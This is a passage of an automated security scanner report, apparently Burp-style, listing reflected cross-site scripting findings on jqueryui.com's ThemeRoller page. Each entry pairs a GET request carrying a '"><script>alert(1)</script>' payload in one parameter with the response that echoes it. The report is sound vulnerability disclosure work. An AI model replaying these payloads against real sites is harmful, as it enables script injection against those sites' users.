png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d59874380f"><script>alert(1)</script>962bd0de158&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHig
...[SNIP]...

4.74. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d1e"><script>alert(1)</script>6798d84993f was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serifc1d1e"><script>alert(1)</script>6798d84993f&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serifc1d1e"><script>alert(1)</script>6798d84993f&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorCont
...[SNIP]...

4.75. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d06c"><script>alert(1)</script>c2aa43a121c was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em2d06c"><script>alert(1)</script>c2aa43a121c&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em2d06c"><script>alert(1)</script>c2aa43a121c&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_
...[SNIP]...

4.76. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 973a4"><script>alert(1)</script>cb8eec49bfe was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold973a4"><script>alert(1)</script>cb8eec49bfe&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold973a4"><script>alert(1)</script>cb8eec49bfe&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTe
...[SNIP]...

4.77. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae84d"><script>alert(1)</script>80ac578362b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01ae84d"><script>alert(1)</script>80ac578362b&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01ae84d"><script>alert(1)</script>80ac578362b&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png
...[SNIP]...

4.78. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ef9"><script>alert(1)</script>f2451ef5de1 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bddc5ef9"><script>alert(1)</script>f2451ef5de1&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bddc5ef9"><script>alert(1)</script>f2451ef5de1&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

4.79. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8451"><script>alert(1)</script>ff0e6439862 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5e8451"><script>alert(1)</script>ff0e6439862&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5e8451"><script>alert(1)</script>ff0e6439862&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityAct
...[SNIP]...

4.80. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ad"><script>alert(1)</script>d64a7ef281d was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a880ad"><script>alert(1)</script>d64a7ef281d&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a880ad"><script>alert(1)</script>d64a7ef281d&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

4.81. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b3d2"><script>alert(1)</script>bf07ccca7fe was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f31b3d2"><script>alert(1)</script>bf07ccca7fe&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f31b3d2"><script>alert(1)</script>bf07ccca7fe&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&
...[SNIP]...

4.82. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d4a"><script>alert(1)</script>7cbe5359106 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff87d4a"><script>alert(1)</script>7cbe5359106&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
